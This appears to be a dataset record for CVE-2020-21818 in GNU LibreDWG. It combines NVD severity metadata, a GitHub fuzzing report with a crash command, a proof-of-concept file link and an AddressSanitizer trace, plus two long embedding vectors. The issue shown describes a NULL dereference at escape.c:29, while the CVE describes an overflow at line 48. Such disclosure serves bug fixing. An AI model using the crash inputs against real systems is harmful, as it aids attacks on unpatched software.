-0.0087906364351511, 0.012889190576970577, -0.0025485625956207514, 0.004295059945434332, 0.0012933304533362389, -0.016634834930300713, 0.01872020587325096, 0.010033837519586086, -0.004503597039729357, -0.013771462254226208, 0.015327469445765018, 0.020741410553455353, -0.004327142611145973, 0.025200894102454185, -0.005975387059152126, -0.0009018222335726023, 0.002823270158842206, 0.01537559274584055, -0.019474146887660027, -0.004086522851139307, -0.0025806452613323927, -0.0049527534283697605, 0.007463218178600073, 0.0247036125510931, -0.008333459496498108, -0.010178209282457829, -0.010980274528265, 0.011822443455457687, -0.019794972613453865, 0.007010051514953375, 0.0066972458735108376, 0.003884001635015011, 0.0012552322586998343, 0.03225906938314438, -0.005666591692715883, 0.012656591832637787, 0.016618793830275536, 0.011260997503995895, -0.007916385307908058, -0.027655214071273804, 0.005975387059152126, -0.01892874203622341, -0.010386746376752853, 0.0018858561525121331, -0.011381307616829872, -0.03991077095270157, 0.015495902858674526, 0.018126677721738815, -0.000028745896997861564, -0.019121238961815834, -0.00920771062374115, 0.023163648322224617, -0.013386471197009087, 0.009656867012381554, 0.01142141129821539, -0.002046269364655018, 0.007058175280690193, -0.024045919999480247, 0.02532922476530075, 0.0010476978495717049, 0.0047522373497486115, 0.035868361592292786, -0.03200240805745125, 0.0033385970164090395, -0.017886057496070862, 0.007463218178600073, -0.002077349228784442, -0.011333183385431767, -0.01310574822127819, 0.006211996078491211, -0.02970850095152855, -0.013811565935611725, 0.013530842959880829, 0.006448605563491583, 0.014212598092854023, 0.021511392667889595, -0.0019690704066306353, -0.010466952808201313, -0.0025325214955955744, 0.01825500838458538, 0.007010051514953375, -0.00468005146831274, -0.0007258691475726664, -0.015519964508712292, 0.0006115748547017574, 0.008132942952215672, -0.014790085144340992, 0.057973284274339676, 0.0010261423885822296, 0.00895104929804802, 0.009384164586663246, -0.01172619592398405, -0.005606437101960182, 0.0016412262339144945, -0.0031140188220888376, -0.002360077342018485, -0.0032704216428101063, -0.010338622145354748, 0.0196666419506073, 0.02548963762819767, -0.015672357752919197, -0.009785197675228119, -0.019586436450481415, 0.02159160003066063, 0.01344261597841978, -0.017452942207455635, -0.012889190576970577, 0.00448755593970418, -0.00790836475789547, 0.0015519964508712292, -0.0034167985431849957, -0.0120390010997653, 0.01407624687999487, -0.006079655606299639, -0.0025144750252366066, 0.010491015389561653, -0.025778381153941154, 0.022040756419301033, -0.00035992683842778206, 0.015632253140211105, 0.000860716390889138, -0.012712735682725906, 0.002642805455252528, -0.01795022375881672, 0.021671805530786514, -0.010779758915305138, -0.022072838619351387, -0.01472591981291771, 0.0007228614413179457, -0.006207985803484917, -0.012817004695534706, 0.009488433599472046, -0.009889465756714344, -0.002680903533473611, -0.008128932677209377, 0.023163648322224617, 0.0078081064857542515, 0.009039276279509068, -0.010699551552534103, -0.01982705667614937, 0.0001829711691243574, -0.004026368260383606, 0.015696419402956963, 0.004266987554728985, -0.013827607035636902, 0.0096247848123312, -0.019153321161866188, -0.015199138782918453, -0.002241772599518299, -0.012448054738342762, 0.007435145787894726, -0.019329775124788284, -0.0028573579620569944, 0.010932151228189468, 0.021719930693507195, -0.015351531095802784, 0.005522219929844141, -0.009945610538125038, -0.004339173436164856, -0.012247538194060326, 0.00793643668293953, 0.0070902579464018345, -0.021415146067738533, 0.011870567686855793, -0.005073063541203737, -0.003148106625303626, 0.00936010293662548, 0.021912425756454468, -0.010499035939574242, 0.008718450553715229, -0.006765421479940414, -0.014974560588598251, -0.019426023587584496, 0.008541996590793133, -0.0007419104804284871, 0.004130636807531118, 0.020741410553455353, 0.0012893200619146228, 0.010081961750984192, -0.010675489902496338, -0.0016943630762398243, -0.00031806904007680714, 0.000954959075897932, 0.012889190576970577, -0.016426298767328262, 0.0012331755133345723, 0.007920395582914352, -0.0061879344284534454, 0.02024412900209427, -0.02231345884501934, -0.012111186981201172, 0.0037396298721432686, -0.019811013713479042, -0.03304509446024895, -0.025986917316913605, -0.005097125191241503, -0.01471789926290512, -0.005947314668446779, 0.0032543803099542856, -0.005221445579081774, 0.003075920743867755, -0.005389879457652569, -0.012343785725533962, 0.0021896385587751865, 0.00335463834926486, 0.010859965346753597, -0.0030919620767235756, 0.005558312870562077, -0.0029756624717265368, 0.04212447255849838, 0.03291676193475723, 0.0065288119949400425, -0.01934581622481346, 0.002492418047040701, 0.012993458658456802, -0.005666591692715883, 0.035707950592041016, -0.0020733389537781477, -0.008766574785113335, 0.014998622238636017, 0.010611324571073055, 0.015856832265853882, 0.020404543727636337, -0.006007469724863768, 0.00022984185488894582, 0.01555204764008522, 0.002135499147698283, -0.01162994746118784, 0.05636915564537048, -0.013145850971341133, 0.006625059992074966, -0.020115800201892853, 0.01115672942250967, -0.00819309800863266, -0.01706795021891594, 0.0002834799815900624, -0.035034216940402985, 0.012544302269816399, -0.00860616099089384, 0.016426298767328262, -0.017356693744659424, -0.015279345214366913, 0.004700102843344212, 0.02277865633368492, 0.015455800108611584, 0.013554904609918594, 0.026227537542581558, -0.014918415807187557, -0.011148708872497082, -0.006444595288485289, 0.03084743395447731, 0.012159311212599277, 0.02558588609099388, -0.003146101487800479, -0.005181342363357544, 0.0036935110110789537, 0.00011416899360483512, -0.016049327328801155, -0.00031982356449589133, 0.020982030779123306, -0.02579442225396633, 0.00021154474234208465, 0.009761135093867779, 0.00798857118934393, 0.010258415713906288, 0.009063338860869408, -0.011365266516804695, 0.015912976115942, 0.007703837938606739, -0.01883249543607235, 0.007218588143587112, 0.011934733018279076, -0.0006692233146168292, -0.005975387059152126, -0.014421135187149048, 0.013089707121253014, 0.00753139378502965, 0.007294784300029278, -0.013843648135662079, -0.001933980151079595, 0.006360378582030535, -0.0013665189035236835, 0.010065920650959015, -0.0026207484770566225, -0.010715593583881855, 0.0255377609282732, 0.009472391568124294, 0.004459483548998833, -0.01653858833014965, 0.008509913459420204, 0.01846354454755783 ]
1,720
CVE-2020-21818
2021-05-17T19:15:07.580000
A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10.2641 via htmlescape ../../programs/escape.c:48.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/182#issuecomment-572891053" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10.2641:*:*:*:*:*:*:*", "matchCriteriaId": "767F5F8A-A209-4A53-B40E-4C30602BA5CB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/182#issuecomment-572891053
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG $PoC **1.NULL pointer dereference in htmlescape ../../programs/escape.c:29** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_7b9cb829/id:000013%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:46417 ASAN says: ``` ================================================================= ==19607==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f433bb56646 bp 0x7ffed1176670 sp 0x7ffed1175de8 T0) ==19607==The signal is caused by a READ memory access. ==19607==Hint: address points to the zero page. #0 0x7f433bb56645 (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) #1 0x7f433c28557b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5157b) #2 0x55950b27cdd4 in htmlescape ../../programs/escape.c:29 #3 0x55950b27abb5 in output_TEXT ../../programs/dwg2SVG.c:113 #4 0x55950b27abb5 in output_object ../../programs/dwg2SVG.c:312 #5 0x55950b27abb5 in output_BLOCK_HEADER ../../programs/dwg2SVG.c:371 #6 0x55950b278477 in output_SVG ../../programs/dwg2SVG.c:411 #7 0x55950b278477 in main ../../programs/dwg2SVG.c:525 #8 0x7f433bac6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55950b278d19 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwg2SVG+0x27ad19) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) ==19607==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/182/comments
9
2020-01-10T06:17:10
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/182
547,887,727
182
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG $PoC **1.NULL pointer dereference in htmlescape ../../programs/escape.c:29** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_7b9cb829/id:000013%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:46417 ASAN says: ``` ================================================================= ==19607==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f433bb56646 bp 0x7ffed1176670 sp 0x7ffed1175de8 T0) ==19607==The signal is caused by a READ memory access. ==19607==Hint: address points to the zero page. #0 0x7f433bb56645 (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) #1 0x7f433c28557b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5157b) #2 0x55950b27cdd4 in htmlescape ../../programs/escape.c:29 #3 0x55950b27abb5 in output_TEXT ../../programs/dwg2SVG.c:113 #4 0x55950b27abb5 in output_object ../../programs/dwg2SVG.c:312 #5 0x55950b27abb5 in output_BLOCK_HEADER ../../programs/dwg2SVG.c:371 #6 0x55950b278477 in output_SVG ../../programs/dwg2SVG.c:411 #7 0x55950b278477 in main ../../programs/dwg2SVG.c:525 #8 0x7f433bac6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55950b278d19 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwg2SVG+0x27ad19) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) ==19607==ABORTING ``` --- end body ---
1,657
[ -0.026348799467086792, 0.0377780981361866, -0.007145183626562357, 0.010695305652916431, 0.06411191821098328, 0.041103530675172806, -0.005965554155409336, 0.04400953650474548, -0.030917523428797722, 0.005576089024543762, -0.013751108199357986, -0.0008013990009203553, -0.0027992790564894676, 0.021225837990641594, -0.008620656095445156, 0.020986167713999748, -0.015608555637300014, -0.0030988676007837057, -0.02068657986819744, -0.027397358790040016, 0.01562353502959013, -0.0062202042900025845, -0.034961968660354614, 0.017675716429948807, -0.024985672906041145, 0.0047559658996760845, 0.007804277818650007, 0.003701789304614067, -0.026633409783244133, 0.017945345491170883, 0.004216706845909357, 0.019008884206414223, 0.010530532337725163, 0.01087505929172039, 0.02959933504462242, -0.023562628775835037, 0.05335669592022896, 0.06291356682777405, 0.013698679395020008, 0.03945579379796982, 0.015458761714398861, -0.07315948605537415, -0.012485346756875515, 0.01433530542999506, 0.00033656886080279946, 0.0029247316997498274, 0.026558512821793556, 0.00033563264878466725, -0.019488226622343063, 0.010582960210740566, -0.01160156074911356, -0.0099088866263628, -0.03433283045887947, -0.08364508301019669, 0.02178007736802101, -0.023188142105937004, 0.026184026151895523, 0.007021603174507618, 0.004872056655585766, 0.006527282297611237, -0.02107604406774044, 0.015743371099233627, -0.00026728902594186366, 0.012118350714445114, 0.011653988622128963, 0.019997525960206985, -0.03256525844335556, -0.0016168411821126938, -0.02393711358308792, -0.003587571205571294, 0.018679337576031685, -0.037568386644124985, 0.0006253907922655344, 0.025734644383192062, 0.0196230411529541, -0.018349789083003998, 0.0018087649950757623, 0.01256773341447115, -0.024446414783596992, 0.004025719128549099, -0.014470119960606098, 0.029749128967523575, -0.028430940583348274, 0.008395965211093426, -0.0004004654474556446, 0.0018546395003795624, -0.014470119960606098, -0.08694055676460266, -0.0024697319604456425, -0.04505809769034386, -0.006205224897712469, 0.03870682045817375, 0.011017363518476486, -0.021615304052829742, -0.0018087649950757623, -0.002037201076745987, -0.03559110313653946, -0.007388599216938019, -0.048862867057323456, -0.000268927396973595, -0.029075054451823235, -0.012193247675895691, -0.0014623658498749137, 0.01972789689898491, 0.03057299740612507, 0.03783801570534706, 0.021225837990641594, -0.0027637029998004436, 0.010710285045206547, 0.1208539605140686, 0.03259521722793579, -0.012919750064611435, -0.022244438529014587, 0.004370246082544327, 0.007141438778489828, 0.013151930645108223, 0.022259417921304703, -0.019832752645015717, -0.038886573165655136, -0.024221722036600113, -0.007190121803432703, -0.028715549036860466, -0.012642630375921726, -0.015001889318227768, -0.04029463976621628, 0.022963451221585274, 0.003988270647823811, -0.01024592388421297, -0.016597198322415352, -0.007186376955360174, -0.03208591789007187, -0.03571093827486038, 0.014724770560860634, -0.017196374014019966, 0.027532175183296204, -0.009684194810688496, -0.04982155188918114, 0.018874069675803185, 0.004845842253416777, -0.008051438257098198, -0.07148179411888123, -0.038407232612371445, 0.027457278221845627, -0.007894154638051987, -0.03472229465842247, 0.0002792257582768798, -0.036639660596847534, -0.003510801587253809, -0.0036587233189493418, -0.013346663676202297, -0.017720654606819153, -0.014200489968061447, 0.018514564260840416, 0.022723780944943428, 0.04736492782831192, -0.023307977244257927, 0.02188493311405182, 0.03696921095252037, 0.010178515687584877, -0.030513079836964607, 0.014320326037704945, -0.026019252836704254, 0.01950320601463318, -0.04727505147457123, -0.03310452029109001, -0.011796293780207634, 0.015046827495098114, 0.02387719601392746, -0.015031848102807999, 0.025270281359553337, -0.0192785132676363, -0.002186995465308428, 0.01969793811440468, 0.02143554948270321, -0.05991768091917038, 0.0038759249728173018, -0.008680573664605618, 0.023382874205708504, -0.017466004937887192, -0.012844853103160858, -0.012095881626009941, 0.005272755865007639, 0.004800904076546431, 0.009691684506833553, 0.015181642025709152, 0.0062426733784377575, 0.03984525799751282, -0.011286993511021137, 0.006740739103406668, -0.029883943498134613, -0.015024358406662941, -0.012537774629890919, -0.0021046085748821497, -0.0446087121963501, 0.02780180424451828, -0.012994647026062012, -0.045447561889886856, -0.007909134030342102, 0.02861069329082966, -0.012058433145284653, 0.013429050333797932, 0.014717280864715576, -0.0061715212650597095, 0.001888343133032322, -0.005943085066974163, 0.014642382971942425, -0.004362755920737982, 0.05371620133519173, 0.004916994832456112, -0.010567980818450451, -0.017031600698828697, -0.03205595910549164, 0.019652999937534332, 0.003950822167098522, -0.02864065207540989, 0.003917118534445763, -0.015608555637300014, 0.020192258059978485, -0.029434561729431152, 0.004093126393854618, 0.029449541121721268, -0.01830485090613365, -0.0010101746302098036, -0.011564112268388271, -0.08076903223991394, -0.012492836453020573, 0.0016645881114527583, 0.024671105667948723, -0.054045747965574265, -0.002001625020056963, 0.008995141834020615, -0.04137315973639488, -0.003714896272867918, 0.015983041375875473, -0.010672836564481258, -0.0021120982710272074, -0.00695045106112957, 0.011571601964533329, -0.02654353342950344, 0.009601808153092861, 0.019548144191503525, 0.02079143561422825, -0.008867816999554634, -0.00838098581880331, 0.025105508044362068, 0.034033242613077164, -0.019847732037305832, -0.012725017964839935, -0.01673201285302639, 0.028520816937088966, 0.011848721653223038, -0.03124707005918026, 0.01782551035284996, 0.02278369851410389, 0.018814152106642723, 0.006145307328552008, 0.03334419056773186, 0.026154067367315292, -0.023248059675097466, -0.034123118966817856, 0.05167900025844574, -0.003551994916051626, -0.006875554099678993, 0.008725511841475964, 0.0013294235104694963, -0.012799914926290512, -0.022469131276011467, 0.014425181783735752, -0.021375631913542747, -0.03604048490524292, 0.04637628421187401, -0.02651357464492321, -0.0008964246953837574, -0.009077528491616249, -0.02693299762904644, 0.011399338953197002, 0.029389621689915657, 0.004812138620764017, 0.0017834872705861926, -0.013518926687538624, 0.0014333432773128152, 0.022289376705884933, -0.020102381706237793, 0.038946494460105896, 0.013953329995274544, -0.012410449795424938, -0.005096747539937496, -0.01712147705256939, -0.01586320623755455, -0.009459503926336765, -0.0030389497987926006, -0.0003733152407221496, -0.03744855150580406, -0.006355018820613623, -0.0024435180239379406, 0.047604598104953766, 0.02149546891450882, -0.0027487236075103283, -0.03957562893629074, -0.012006005272269249, -0.020551765337586403, -0.017391106113791466, -0.010298351757228374, 0.0028704314026981592, -0.03571093827486038, 0.009047569707036018, -0.010223454795777798, 0.027951598167419434, -0.022289376705884933, -0.009676705114543438, 0.02480592019855976, -0.05392591282725334, -0.007781808730214834, -0.023697443306446075, -0.01956312358379364, -0.022678842768073082, 0.007654483895748854, -0.04203225299715996, -0.0016196498181670904, 0.0009142127237282693, -0.04859323799610138, -0.010305841453373432, -0.03352394327521324, 0.012710037641227245, 0.03807768598198891, -0.022633904591202736, -0.00920485332608223, 0.03127703070640564, -0.06776689738035202, 0.028371021151542664, 0.022229459136724472, -0.02667834796011448, -0.0008491458720527589, -0.019473247230052948, -0.009744113311171532, -0.05683191865682602, -0.03915620595216751, 0.015968061983585358, 0.02970419079065323, -0.015076786279678345, -0.014447650872170925, 0.027846742421388626, 0.013728639110922813, -0.008216211572289467, 0.01698666252195835, -0.029239827767014503, 0.014589955098927021, -0.004598681814968586, 0.034482624381780624, -0.015286498703062534, 0.0009558742749504745, 0.057131510227918625, -0.011946087703108788, 0.02124081738293171, 0.009489462710916996, -0.044968221336603165, 0.0024884562008082867, -0.035471267998218536, 0.01533143687993288, -0.009362137876451015, 0.01840970665216446, -0.010755224153399467, 0.016522301360964775, 0.013646251522004604, 0.01486707478761673, 0.005373867228627205, 0.0027000405825674534, 0.0037036617286503315, -0.0049506984651088715, 0.0008571037324145436, -0.03433283045887947, 0.050570521503686905, -0.02503061108291149, -0.024251680821180344, -0.017241312190890312, -0.019008884206414223, 0.035770855844020844, 0.00975160300731659, -0.03783801570534706, 0.005164155270904303, -0.02390715479850769, -0.013826005160808563, 0.003692427184432745, -0.02536015771329403, 0.024146825075149536, 0.0596480518579483, -0.009886417537927628, 0.02729250304400921, -0.010215964168310165, -0.027891680598258972, -0.003654978470876813, 0.0721408873796463, -0.016297608613967896, -0.04823373258113861, 0.016237691044807434, 0.04140311852097511, -0.02023719623684883, -0.012170778587460518, 0.00975160300731659, -0.03696921095252037, -0.008995141834020615, 0.019383369013667107, -0.012792425230145454, 0.0024510077200829983, 0.009564359672367573, 0.03301464393734932, -0.0013762342277914286, -0.01843966543674469, 0.018349789083003998, 0.002638250356540084, -0.003514546435326338, -0.02197480946779251, -0.004123085644096136, 0.0019080037018284202, 0.0525178462266922, 0.033224355429410934, -0.0032243202440440655, 0.02516542561352253, -0.024955714121460915, -0.008118845522403717, -0.0008290173136629164, -0.018799172714352608, 0.019638020545244217, 0.026888059452176094, 0.0029940116219222546, 0.02491077594459057, -0.024311598390340805, 0.02059670351445675, 0.028101392090320587, -0.033284272998571396, -0.01580328866839409, 0.011017363518476486, 0.011713906191289425, 0.03469233587384224, -0.02329299785196781, -0.04029463976621628, -0.01489703357219696, -0.040594227612018585, 0.0041380650363862514, 0.015878185629844666, 0.0027543408796191216, 0.02046188898384571, -0.02687308005988598, -0.003810390131548047, -0.021031105890870094, -0.029389621689915657, -0.04359011352062225, -0.008148804306983948, 0.021285755559802055, -0.034033242613077164, 0.00811135582625866, 0.02178007736802101, -0.01569843292236328, 0.010770203545689583, 0.0030632915440946817, -0.011616540141403675, -0.039305999875068665, -0.0004009335534647107, 0.03421299532055855, 0.007841726765036583, -0.024461394175887108, 0.02404196932911873, -0.021705180406570435, -0.014380243606865406, 0.009901396930217743, 0.03819752112030983, 0.0381675623357296, -0.040114887058734894, 0.0018284254474565387, 0.0036999168805778027, 0.0018817896489053965, 0.021705180406570435, 0.016462383791804314, -0.023083286359906197, -0.00881538912653923, 0.02873052842915058, -0.018170036375522614, -0.008148804306983948, 0.0009774072095751762, -0.010702795349061489, 0.0010822630720213056, -0.028820404782891273, 0.006613414268940687, -0.015953082591295242, 0.027816783636808395, -0.0256747268140316, 0.04263142868876457, -0.0000201432249014033, -0.00006050281444913708, 0.039335958659648895, -0.003992015495896339, 0.013885922729969025, -0.0073960889130830765, -0.05850961431860924, 0.0006773506756871939, 0.02906007505953312, -0.01969793811440468, -0.0449083037674427, 0.041043613106012344, 0.02017727866768837, 0.03316443786025047, 0.001151542877778411, 0.02744229882955551, -0.0037523447535932064, 0.0249407347291708, -0.00835102703422308, -0.04086385667324066, 0.006534771993756294, -0.004958188161253929, -0.030198510736227036, 0.009496952407062054, -0.03786797448992729, 0.00784921646118164, -0.051499247550964355, 0.00279178936034441, -0.01763077825307846, -0.006122838240116835, 0.010553001426160336, 0.004351521376520395, 0.004658599849790335, -0.010455635376274586, -0.031157193705439568, -0.015009379014372826, 0.034452665597200394, 0.015953082591295242, 0.010949956253170967, 0.0021214603912085295, -0.011609050445258617, 0.01840970665216446, -0.0321158766746521, 0.003439649473875761, -0.011781314387917519, -0.02673826552927494, 0.05075027421116829, -0.006422426551580429, 0.0188890490680933, -0.011054811999201775, 0.030917523428797722, 0.005010616034269333, -0.015653494745492935, -0.02294847182929516, 0.03681941330432892, -0.05281743407249451, 0.001921110670082271, -0.004415184259414673, 0.018574481830000877, -0.014515058137476444, 0.02068657986819744, 0.003430287353694439, -0.018035221844911575, -0.0060254717245697975, 0.004636130761355162, -0.0021532915998250246, 0.0044002048671245575, -0.016327567398548126, -0.010642877779901028, -0.025075549259781837, -0.008770450949668884, 0.030543038621544838, -0.009070038795471191, 0.012680078856647015, -0.005231562536209822, 0.03792789205908775, -0.004815883468836546, -0.005617282819002867, 0.006770697887986898, 0.00039835897041484714, 0.03043818287551403, -0.04391966015100479, -0.021120982244610786, 0.029329704120755196, 0.018199995160102844, 0.012672589160501957, -0.020716538652777672, -0.03912624716758728, -0.005463743582367897, -0.021285755559802055, -0.00492448452860117, -0.0058569530956447124, -0.031876206398010254, 0.00005111141945235431, -0.035351432859897614, -0.01647736318409443, 0.026139087975025177, 0.018814152106642723, -0.012253166176378727, 0.009437034837901592, -0.007160163018852472, 0.019742876291275024, -0.005643496755510569, 0.00676695303991437, 0.0031381885055452585, -0.0153988441452384, -0.012088391929864883, 0.026858100667595863, 0.01240296009927988, -0.008890286087989807, 0.0053513976745307446, -0.01312946155667305, 0.008747981861233711, -0.0022937236353754997, 0.014470119960606098, 0.024566249921917915, -0.02339785359799862, -0.02805645391345024, 0.011212095618247986, 0.009197363629937172, -0.010770203545689583, -0.022633904591202736, 0.02068657986819744, 0.019428307190537453, 0.008066417649388313, 0.06914500147104263, -0.005478722974658012, 0.019877690821886063, -0.008148804306983948, -0.01017102599143982, 0.027532175183296204, -0.0307976882904768, 0.018095139414072037, 0.01580328866839409, -0.03478221222758293, 0.01589316502213478, 0.020716538652777672, 0.008358516730368137, 0.0377780981361866, 0.0029809046536684036, -0.0052128382958471775, -0.017451023682951927, 0.0017788062104955316, -0.02085135318338871, 0.01914369873702526, 0.00015775201609358191, -0.02252904884517193, -0.021225837990641594, 0.04005496948957443, 0.054105665534734726, 0.0307976882904768, -0.014500078745186329, 0.013623782433569431, 0.0075121792033314705, -0.0006548815290443599, -0.013391601853072643, 0.013429050333797932, -0.019158678129315376, -0.007339915726333857, 0.009197363629937172, 0.01656723953783512, 0.017421064898371696, 0.047934144735336304, -0.022573987022042274, -0.018874069675803185, 0.00854575913399458, 0.015578596852719784, 0.02774188667535782, -0.004149299580603838, 0.010463125072419643, 0.0321158766746521, -0.001039197319187224, 0.01837974786758423, 0.00031644024420529604, -0.03021349012851715, -0.03822747990489006, 0.007092755287885666, -0.013144440948963165, 0.0072500393725931644, -0.03984525799751282, -0.007223825436085463, 0.008051438257098198, 0.020132340490818024, -0.0008102930150926113, -0.008620656095445156, -0.003293599933385849, -0.00107570958789438, -0.018035221844911575, -0.011444277130067348, 0.004669834394007921, 0.024925755336880684, -0.02914995141327381, 0.007354895118623972, 0.01007365994155407, 0.003872180124744773, 0.0010963063687086105, -0.0027225096710026264, -0.019023863598704338, 0.00987892784178257, -0.007976541295647621, -0.0016730140196159482, -0.011391849257051945, -0.03298468515276909, 0.02374238148331642, -0.003385348943993449, -0.0004369777743704617, 0.01430534664541483, 0.02336789481341839, -0.012013494968414307, 0.028775466606020927, -0.020027484744787216, -0.024790940806269646, -0.000449616665719077, -0.017705675214529037, -0.008118845522403717, 0.003928353078663349, -0.010283372364938259, 0.023832257837057114, 0.02011736109852791, -0.011579091660678387, -0.0033816040959209204, 0.023158183321356773, 0.0034827152267098427, -0.01462740357965231, 0.003465863410383463, -0.03642994910478592, 0.005104237236082554, -0.0008571037324145436, -0.02783176302909851, 0.020896291360259056, 0.006250163074582815, -0.00997629389166832, 0.00870304275304079, -0.016776951029896736, -0.028970198705792427, 0.0034265422727912664, -0.04302089661359787, -0.0032018511556088924, -0.015743371099233627, -0.003244916908442974, -0.012822384014725685, -0.0005575153045356274, 0.008650614880025387, 0.01709151826798916, -0.029299745336174965, 0.017001641914248466, 0.020941229537129402, -0.039725422859191895, 0.006624648813158274, 0.010762713849544525, -0.01737612672150135, -0.0005083640571683645, 0.008006500080227852, -0.0020446907728910446, 0.0025596085470169783, 0.00801398977637291, -0.026588471606373787, -0.002864814130589366, -0.004857076797634363, 0.008785430341959, -0.0027449787594377995, -0.027112750336527824, 0.031157193705439568, 0.002746851183474064, 0.007508434355258942, 0.011728886514902115, -0.03208591789007187, -0.0070777758955955505, -0.009407076053321362, 0.018963946029543877, -0.02959933504462242, -0.002136439783498645, -0.009729133918881416, -0.033643778413534164, 0.022049706429243088, -0.00920485332608223, 0.029494479298591614, 0.036729536950588226, 0.005729628261178732, 0.004931974224746227, -0.03657974302768707, 0.004108105786144733, 0.015039337798953056, 0.027142709121108055, -0.009369627572596073, -0.009938845410943031, -0.009219832718372345, 0.0236225463449955, -0.017106497660279274, 0.018589461222290993, 0.006055430509150028, 0.03903637081384659, 0.020581724122166634, -0.02233431488275528, -0.013556375168263912, -0.031486742198467255, 0.015533658675849438, 0.0009755347273312509, 0.009025100618600845, 0.034961968660354614, -0.020896291360259056, 0.0007630141917616129, 0.00372425839304924, 0.001731059281155467, -0.012140819802880287, 0.030947482213377953, -0.006238928530365229, -0.011526663787662983, -0.040624186396598816, 0.02336789481341839, 0.0200125053524971, -0.007976541295647621, -0.024281639605760574, 0.02645365707576275, -0.009616787545382977, -0.03259521722793579, -0.035471267998218536, 0.010448145680129528, -0.02194485068321228, -0.022439170628786087, 0.0377780981361866, -0.027652010321617126, 0.024955714121460915, -0.0005636006826534867, -0.0022487854585051537, 0.006343784276396036, 0.04505809769034386, -0.005898146890103817, 0.0036081678699702024, 0.015016868710517883, -0.023278018459677696, -0.009511931799352169, 0.021795056760311127, -0.02651357464492321, -0.0015241559594869614, 0.0046623446978628635, -0.053266819566488266, 0.003308579558506608, -0.026363778859376907, 0.0017844234826043248, 0.005534895695745945, 0.02046188898384571, -0.0010335800470784307, 0.0016748864436522126, -0.002445390447974205, -0.01169892679899931, 0.0022562751546502113, 0.012680078856647015, 0.028985178098082542, 0.019892670214176178, -0.0042054723016917706, 0.002100863726809621, 0.04643620178103447, -0.023502711206674576, -0.0018068925710394979, -0.014178020879626274, -0.00361565756611526, -0.03018353134393692, -0.02059670351445675, -0.028341062366962433, -0.0027000405825674534, 0.010088639333844185, 0.006957940757274628, 0.035021886229515076, 0.026049211621284485, -0.006991644389927387, 0.0004098275676369667, -0.01100238412618637, 0.014582465402781963, 0.017271270975470543, -0.002739361487329006, 0.011316952295601368, -0.015608555637300014, 0.031876206398010254, -0.0045387642458081245, -0.0016065428499132395, -0.005752097349613905, 0.01402822695672512, 0.013953329995274544, -0.011272014118731022, -0.03939587622880936, -0.005695924628525972, -0.030363284051418304, -0.04817381501197815, -0.007620780263096094, 0.020761476829648018, -0.00449008122086525, -0.013294235803186893, -0.021959830075502396, -0.000704968988429755, -0.01290477067232132, 0.022858595475554466, 0.03960558772087097, 0.0005673455307260156, -0.012515305541455746, -0.01586320623755455, 0.013286746107041836, 0.0026775712613016367, -0.07405825704336166, 0.012485346756875515, -0.016971683129668236, -0.006826870609074831, -0.02670830674469471, -0.0021851230412721634, 0.030543038621544838, -0.05084015056490898, -0.038017768412828445, 0.029045095667243004, 0.03657974302768707, -0.0027094027027487755, -0.014889543876051903, -0.03825743868947029, -0.003845966188237071, -0.009616787545382977, -0.013384112156927586, 0.03421299532055855, -0.033284272998571396, -0.0010766457999125123, -0.020866332575678825, 0.024596208706498146, -0.001545688952319324, 0.0135938236489892, 0.021735139191150665, 